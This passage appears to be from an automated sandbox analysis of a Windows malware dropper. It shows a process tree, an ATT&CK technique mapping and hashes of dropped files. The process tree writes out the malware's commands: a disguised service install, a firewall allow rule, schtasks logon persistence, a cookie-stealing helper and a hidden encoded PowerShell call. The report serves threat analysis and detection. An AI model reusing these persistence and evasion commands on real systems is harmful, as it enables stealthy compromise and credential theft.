                                                                        • C:\Users\Admin\Documents\DWl6brek2V1On5wQYhp9pEx0.exe
                                                                          "C:\Users\Admin\Documents\DWl6brek2V1On5wQYhp9pEx0.exe"
                                                                          2⤵
                                                                            PID:1028
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\qjgskukp\
                                                                              3⤵
                                                                                PID:5604
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\rdmfvvzq.exe" C:\Windows\SysWOW64\qjgskukp\
                                                                                3⤵
                                                                                  PID:5732
                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                  "C:\Windows\System32\sc.exe" create qjgskukp binPath= "C:\Windows\SysWOW64\qjgskukp\rdmfvvzq.exe /d\"C:\Users\Admin\Documents\DWl6brek2V1On5wQYhp9pEx0.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                  3⤵
                                                                                    PID:5992
                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                    "C:\Windows\System32\sc.exe" description qjgskukp "wifi internet conection"
                                                                                    3⤵
                                                                                      PID:3984
                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                      "C:\Windows\System32\sc.exe" start qjgskukp
                                                                                      3⤵
                                                                                        PID:456
                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                        3⤵
                                                                                          PID:316
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 1364
                                                                                          3⤵
                                                                                          • Program crash
                                                                                          PID:60
                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\sonia_4.exe
                                                                                      sonia_4.exe
                                                                                      1⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:3600
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:2000
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:3240
                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\sonia_6.exe
                                                                                      sonia_6.exe
                                                                                      1⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:3612
                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\sonia_2.exe
                                                                                      sonia_2.exe
                                                                                      1⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      PID:4356
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 2328 -ip 2328
                                                                                      1⤵
                                                                                        PID:5056
                                                                                      • C:\Windows\system32\rUNdlL32.eXe
                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                        1⤵
                                                                                        • Process spawned unexpected child process
                                                                                        PID:1240
                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                          2⤵
                                                                                          • Loads dropped DLL
                                                                                          PID:3492
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 600
                                                                                            3⤵
                                                                                            • Program crash
                                                                                            PID:1156
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3492 -ip 3492
                                                                                        1⤵
                                                                                          PID:2152
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4948 -ip 4948
                                                                                          1⤵
                                                                                            PID:3952
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 544 -ip 544
                                                                                            1⤵
                                                                                              PID:4920
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4788 -ip 4788
                                                                                              1⤵
                                                                                                PID:3472
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1300 -ip 1300
                                                                                                1⤵
                                                                                                  PID:3452
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1864 -ip 1864
                                                                                                  1⤵
                                                                                                    PID:1044
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4384 -ip 4384
                                                                                                    1⤵
                                                                                                      PID:3768
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1300 -ip 1300
                                                                                                      1⤵
                                                                                                        PID:4712
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1864 -ip 1864
                                                                                                        1⤵
                                                                                                          PID:3496
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4788 -ip 4788
                                                                                                          1⤵
                                                                                                            PID:3984
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 544 -ip 544
                                                                                                            1⤵
                                                                                                              PID:1480
                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                              schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\KBDUR1\dllhost.exe'" /rl HIGHEST /f
                                                                                                              1⤵
                                                                                                              • Process spawned unexpected child process
                                                                                                              • Creates scheduled task(s)
                                                                                                              PID:1524
                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                              schtasks.exe /create /tn "9wEJyzAOuFaVlBCSiMboQisU" /sc ONLOGON /tr "'C:\Users\Admin\Documents\AssertDebug\9wEJyzAOuFaVlBCSiMboQisU.exe'" /rl HIGHEST /f
                                                                                                              1⤵
                                                                                                              • Process spawned unexpected child process
                                                                                                              • Creates scheduled task(s)
                                                                                                              PID:3128
                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                              schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\odt\powershell.exe'" /rl HIGHEST /f
                                                                                                              1⤵
                                                                                                              • Process spawned unexpected child process
                                                                                                              • Creates scheduled task(s)
                                                                                                              PID:5320
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4356 -ip 4356
                                                                                                              1⤵
                                                                                                                PID:5192
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "06kWB4m9ah3aiDe3l90FsCgW" /sc ONLOGON /tr "'C:\PerfLogs\06kWB4m9ah3aiDe3l90FsCgW.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:5372
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "XCdJQC9CdkftuW1pQh72Amhi" /sc ONLOGON /tr "'C:\Windows\Speech_OneCore\Engines\Lexicon\en-US\XCdJQC9CdkftuW1pQh72Amhi.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:5544
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "DWl6brek2V1On5wQYhp9pEx0" /sc ONLOGON /tr "'C:\Users\Admin\Documents\GroupInvoke\DWl6brek2V1On5wQYhp9pEx0.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:5676
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:5820
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1864 -ip 1864
                                                                                                                1⤵
                                                                                                                  PID:6036
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1028 -ip 1028
                                                                                                                  1⤵
                                                                                                                    PID:212
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 1864 -ip 1864
                                                                                                                    1⤵
                                                                                                                      PID:2132
                                                                                                                    • C:\Windows\SysWOW64\qjgskukp\rdmfvvzq.exe
                                                                                                                      C:\Windows\SysWOW64\qjgskukp\rdmfvvzq.exe /d"C:\Users\Admin\Documents\DWl6brek2V1On5wQYhp9pEx0.exe"
                                                                                                                      1⤵
                                                                                                                        PID:5592
                                                                                                                        • C:\Windows\SysWOW64\svchost.exe
                                                                                                                          svchost.exe
                                                                                                                          2⤵
                                                                                                                            PID:1048
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5592 -s 564
                                                                                                                            2⤵
                                                                                                                            • Program crash
                                                                                                                            PID:5948
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1864 -ip 1864
                                                                                                                          1⤵
                                                                                                                            PID:4900
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 5592 -ip 5592
                                                                                                                            1⤵
                                                                                                                              PID:5940
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4356 -ip 4356
                                                                                                                              1⤵
                                                                                                                                PID:4412
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1864 -ip 1864
                                                                                                                                1⤵
                                                                                                                                  PID:6096
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1864 -ip 1864
                                                                                                                                  1⤵
                                                                                                                                    PID:5228
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 4356 -ip 4356
                                                                                                                                    1⤵
                                                                                                                                      PID:5888
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4600 -ip 4600
                                                                                                                                      1⤵
                                                                                                                                        PID:5900
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                        1⤵
                                                                                                                                          PID:4104
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1864 -ip 1864
                                                                                                                                          1⤵
                                                                                                                                            PID:2300

                                                                                                                                          Network

                                                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                          Execution

                                                                                                                                          Scheduled Task

                                                                                                                                          1
                                                                                                                                          T1053

                                                                                                                                          Persistence

                                                                                                                                          Modify Existing Service

                                                                                                                                          2
                                                                                                                                          T1031

                                                                                                                                          New Service

                                                                                                                                          1
                                                                                                                                          T1050

                                                                                                                                          Scheduled Task

                                                                                                                                          1
                                                                                                                                          T1053

                                                                                                                                          Privilege Escalation

                                                                                                                                          New Service

                                                                                                                                          1
                                                                                                                                          T1050

                                                                                                                                          Scheduled Task

                                                                                                                                          1
                                                                                                                                          T1053

                                                                                                                                          Defense Evasion

                                                                                                                                          Modify Registry

                                                                                                                                          2
                                                                                                                                          T1112

                                                                                                                                          Disabling Security Tools

                                                                                                                                          1
                                                                                                                                          T1089

                                                                                                                                          Install Root Certificate

                                                                                                                                          1
                                                                                                                                          T1130

                                                                                                                                          Credential Access

                                                                                                                                          Credentials in Files

                                                                                                                                          1
                                                                                                                                          T1081

                                                                                                                                          Discovery

                                                                                                                                          Query Registry

                                                                                                                                          2
                                                                                                                                          T1012

                                                                                                                                          System Information Discovery

                                                                                                                                          3
                                                                                                                                          T1082

                                                                                                                                          Peripheral Device Discovery

                                                                                                                                          1
                                                                                                                                          T1120

                                                                                                                                          Collection

                                                                                                                                          Data from Local System

                                                                                                                                          1
                                                                                                                                          T1005

                                                                                                                                          Command and Control

                                                                                                                                          Web Service

                                                                                                                                          1
                                                                                                                                          T1102

                                                                                                                                          Replay Monitor

                                                                                                                                          Loading Replay Monitor...

                                                                                                                                          Downloads

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\libcurl.dll
                                                                                                                                            MD5

                                                                                                                                            d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                            SHA1

                                                                                                                                            028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                            SHA256

                                                                                                                                            0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                            SHA512

                                                                                                                                            857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\libcurl.dll
                                                                                                                                            MD5

                                                                                                                                            d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                            SHA1

                                                                                                                                            028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                            SHA256

                                                                                                                                            0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                            SHA512

                                                                                                                                            857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\libcurlpp.dll
                                                                                                                                            MD5

                                                                                                                                            e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                            SHA1

                                                                                                                                            b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                            SHA256

                                                                                                                                            43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                            SHA512

                                                                                                                                            9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\libcurlpp.dll
                                                                                                                                            MD5

                                                                                                                                            e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                            SHA1

                                                                                                                                            b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                            SHA256

                                                                                                                                            43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                            SHA512

                                                                                                                                            9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\libgcc_s_dw2-1.dll
                                                                                                                                            MD5

                                                                                                                                            9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                            SHA1

                                                                                                                                            64264300801a353db324d11738ffed876550e1d3

                                                                                                                                            SHA256

                                                                                                                                            59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                            SHA512

                                                                                                                                            0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\libgcc_s_dw2-1.dll
                                                                                                                                            MD5

                                                                                                                                            9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                            SHA1

                                                                                                                                            64264300801a353db324d11738ffed876550e1d3

                                                                                                                                            SHA256

                                                                                                                                            59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                            SHA512

                                                                                                                                            0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\libstdc++-6.dll
                                                                                                                                            MD5

                                                                                                                                            5e279950775baae5fea04d2cc4526bcc

                                                                                                                                            SHA1

                                                                                                                                            8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                            SHA256

                                                                                                                                            97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                            SHA512

                                                                                                                                            666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\libstdc++-6.dll
                                                                                                                                            MD5

                                                                                                                                            5e279950775baae5fea04d2cc4526bcc

                                                                                                                                            SHA1

                                                                                                                                            8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                            SHA256

                                                                                                                                            97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                            SHA512

                                                                                                                                            666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\libwinpthread-1.dll
                                                                                                                                            MD5

                                                                                                                                            1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                            SHA1

                                                                                                                                            fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                            SHA256

                                                                                                                                            509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                            SHA512

                                                                                                                                            3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\libwinpthread-1.dll
                                                                                                                                            MD5

                                                                                                                                            1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                            SHA1

                                                                                                                                            fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                            SHA256

                                                                                                                                            509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                            SHA512

                                                                                                                                            3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\setup_install.exe
                                                                                                                                            MD5

                                                                                                                                            0d2fb89a81912ae4e75ea3bd5360d107

                                                                                                                                            SHA1

                                                                                                                                            31fe75463876ce61822357c70eae0d4889d37484

                                                                                                                                            SHA256

                                                                                                                                            c8973f99669bc48fc477fd54711b93f4a4befd5ac93eae6e65c3c63b771f9af5

                                                                                                                                            SHA512

                                                                                                                                            15871c43618c98b91f4ab7adcb75856575d9c1a23ad14b704cb9009f0c459f01b3a941eef6c2dc6886be5cc8b231f87088881cd4b145bfb70d4477de54a7fb45

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\setup_install.exe
                                                                                                                                            MD5

                                                                                                                                            0d2fb89a81912ae4e75ea3bd5360d107

                                                                                                                                            SHA1

                                                                                                                                            31fe75463876ce61822357c70eae0d4889d37484

                                                                                                                                            SHA256

                                                                                                                                            c8973f99669bc48fc477fd54711b93f4a4befd5ac93eae6e65c3c63b771f9af5

                                                                                                                                            SHA512

                                                                                                                                            15871c43618c98b91f4ab7adcb75856575d9c1a23ad14b704cb9009f0c459f01b3a941eef6c2dc6886be5cc8b231f87088881cd4b145bfb70d4477de54a7fb45

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\sonia_1.exe
                                                                                                                                            MD5

                                                                                                                                            b65276c9e9864815be738ec102f747d4

                                                                                                                                            SHA1

                                                                                                                                            7b2d710d28b7584a402015b381200af16929a71a

                                                                                                                                            SHA256

                                                                                                                                            3f8b6c43ac0c4fa103b16d2c1db4f6b7bb5d6976e1f7618c7530be2f1470f193

                                                                                                                                            SHA512

                                                                                                                                            71af45c98057b59ee1e9c1aaf79b9b25bb2e30c2087d310d107f9bdd02da8a857babcb976456a326f37e1b35b074451878aa83a85b69b4df0db18cdb2ca3f54b

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\sonia_1.exe
                                                                                                                                            MD5

                                                                                                                                            b65276c9e9864815be738ec102f747d4

                                                                                                                                            SHA1

                                                                                                                                            7b2d710d28b7584a402015b381200af16929a71a

                                                                                                                                            SHA256

                                                                                                                                            3f8b6c43ac0c4fa103b16d2c1db4f6b7bb5d6976e1f7618c7530be2f1470f193

                                                                                                                                            SHA512

                                                                                                                                            71af45c98057b59ee1e9c1aaf79b9b25bb2e30c2087d310d107f9bdd02da8a857babcb976456a326f37e1b35b074451878aa83a85b69b4df0db18cdb2ca3f54b

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\sonia_1.txt
                                                                                                                                            MD5

                                                                                                                                            b65276c9e9864815be738ec102f747d4

                                                                                                                                            SHA1

                                                                                                                                            7b2d710d28b7584a402015b381200af16929a71a

                                                                                                                                            SHA256

                                                                                                                                            3f8b6c43ac0c4fa103b16d2c1db4f6b7bb5d6976e1f7618c7530be2f1470f193

                                                                                                                                            SHA512

                                                                                                                                            71af45c98057b59ee1e9c1aaf79b9b25bb2e30c2087d310d107f9bdd02da8a857babcb976456a326f37e1b35b074451878aa83a85b69b4df0db18cdb2ca3f54b

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\sonia_10.exe
                                                                                                                                            MD5

                                                                                                                                            3efa4c51a82c52ad4b51896d5d0907c1

                                                                                                                                            SHA1

                                                                                                                                            4257883615634a6b483e99b71612888139156a52

                                                                                                                                            SHA256

                                                                                                                                            6f277908c453c3f256ddfdb9e24a794dcb70b17bf7f13637e74c979461e04df8

                                                                                                                                            SHA512

                                                                                                                                            fabdea18df69f55557765a65c53c256f20edb93aae2aeaba414fe0d11c9a61b8e3355d7e9cb78a60af83a45b52e304e91a81e60fce341f3518f23000e569a580

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\sonia_10.txt
                                                                                                                                            MD5

                                                                                                                                            3efa4c51a82c52ad4b51896d5d0907c1

                                                                                                                                            SHA1

                                                                                                                                            4257883615634a6b483e99b71612888139156a52

                                                                                                                                            SHA256

                                                                                                                                            6f277908c453c3f256ddfdb9e24a794dcb70b17bf7f13637e74c979461e04df8

                                                                                                                                            SHA512

                                                                                                                                            fabdea18df69f55557765a65c53c256f20edb93aae2aeaba414fe0d11c9a61b8e3355d7e9cb78a60af83a45b52e304e91a81e60fce341f3518f23000e569a580

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\sonia_2.exe
                                                                                                                                            MD5

                                                                                                                                            620b443c4123d79ff4ebc86ca761d67c

                                                                                                                                            SHA1

                                                                                                                                            166ceee59b78931baad9c321d7d35cb029607b9c

                                                                                                                                            SHA256

                                                                                                                                            300e04990181d217f86cbc2fcfd6aefdd039661915cc643a7dca042fce409149

                                                                                                                                            SHA512

                                                                                                                                            4fc150ba25ec9605381bd53102a9c60a7b22d1cac77d47ff73f6dfa3977f0ffb1bb038a610c8935ef3e451bc38186f2d39d3865437e0d8cf30997e228461e008

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\sonia_2.txt
                                                                                                                                            MD5

                                                                                                                                            620b443c4123d79ff4ebc86ca761d67c

                                                                                                                                            SHA1

                                                                                                                                            166ceee59b78931baad9c321d7d35cb029607b9c

                                                                                                                                            SHA256

                                                                                                                                            300e04990181d217f86cbc2fcfd6aefdd039661915cc643a7dca042fce409149

                                                                                                                                            SHA512

                                                                                                                                            4fc150ba25ec9605381bd53102a9c60a7b22d1cac77d47ff73f6dfa3977f0ffb1bb038a610c8935ef3e451bc38186f2d39d3865437e0d8cf30997e228461e008

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\sonia_3.exe
                                                                                                                                            MD5

                                                                                                                                            3f01da9f19542e016bceec1dbdeb3e3f

                                                                                                                                            SHA1

                                                                                                                                            1e111feb0b8f83f9165d9acec104f2cb9cdfb2fa

                                                                                                                                            SHA256

                                                                                                                                            78e4c482730fe7c66875546a660b841f31bf714c27099449e491a9c4a5a34401

                                                                                                                                            SHA512

                                                                                                                                            98a81cfb52fed17dded2e7c1cb0e242076362bb13e5dab08b5917115e7f1d8046c715ad7184c4bf65e15febfc75dc9e1f3db783d368a92727b2ab3c2ac43afea

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\sonia_3.txt
                                                                                                                                            MD5

                                                                                                                                            3f01da9f19542e016bceec1dbdeb3e3f

                                                                                                                                            SHA1

                                                                                                                                            1e111feb0b8f83f9165d9acec104f2cb9cdfb2fa

                                                                                                                                            SHA256

                                                                                                                                            78e4c482730fe7c66875546a660b841f31bf714c27099449e491a9c4a5a34401

                                                                                                                                            SHA512

                                                                                                                                            98a81cfb52fed17dded2e7c1cb0e242076362bb13e5dab08b5917115e7f1d8046c715ad7184c4bf65e15febfc75dc9e1f3db783d368a92727b2ab3c2ac43afea

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\sonia_4.exe
                                                                                                                                            MD5

                                                                                                                                            5668cb771643274ba2c375ec6403c266

                                                                                                                                            SHA1

                                                                                                                                            dd78b03428b99368906fe62fc46aaaf1db07a8b9

                                                                                                                                            SHA256

                                                                                                                                            d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384

                                                                                                                                            SHA512

                                                                                                                                            135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\sonia_4.txt
                                                                                                                                            MD5

                                                                                                                                            5668cb771643274ba2c375ec6403c266

                                                                                                                                            SHA1

                                                                                                                                            dd78b03428b99368906fe62fc46aaaf1db07a8b9

                                                                                                                                            SHA256

                                                                                                                                            d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384

                                                                                                                                            SHA512

                                                                                                                                            135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\sonia_5.exe
                                                                                                                                            MD5

                                                                                                                                            8c4df9d37195987ede03bf8adb495686

                                                                                                                                            SHA1

                                                                                                                                            010626025ca791720f85984a842c893b78f439d2

                                                                                                                                            SHA256

                                                                                                                                            5207c76c2e29a2f9951dc4697199a89fdd9516a324f4df7fa04184c3942cc185

                                                                                                                                            SHA512

                                                                                                                                            8fcb279c27682e13ec716e250c9d87cd3d9447b6376e4e6b97e8a283994c02eeac112f2e2c60d4e6316ece5e11fd992cd06efa48c72ee7b0c306b16347698655

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS81F6283D\sonia_5.txt
                                                                                                                                            MD5

                                                                                                                                            8c4df9d37195987ede03bf8adb495686

                                                                                                                                            SHA1

                                                                                                                                            010626025ca791720f85984a842c893b78f439d2

                                                                                                                                            SHA256

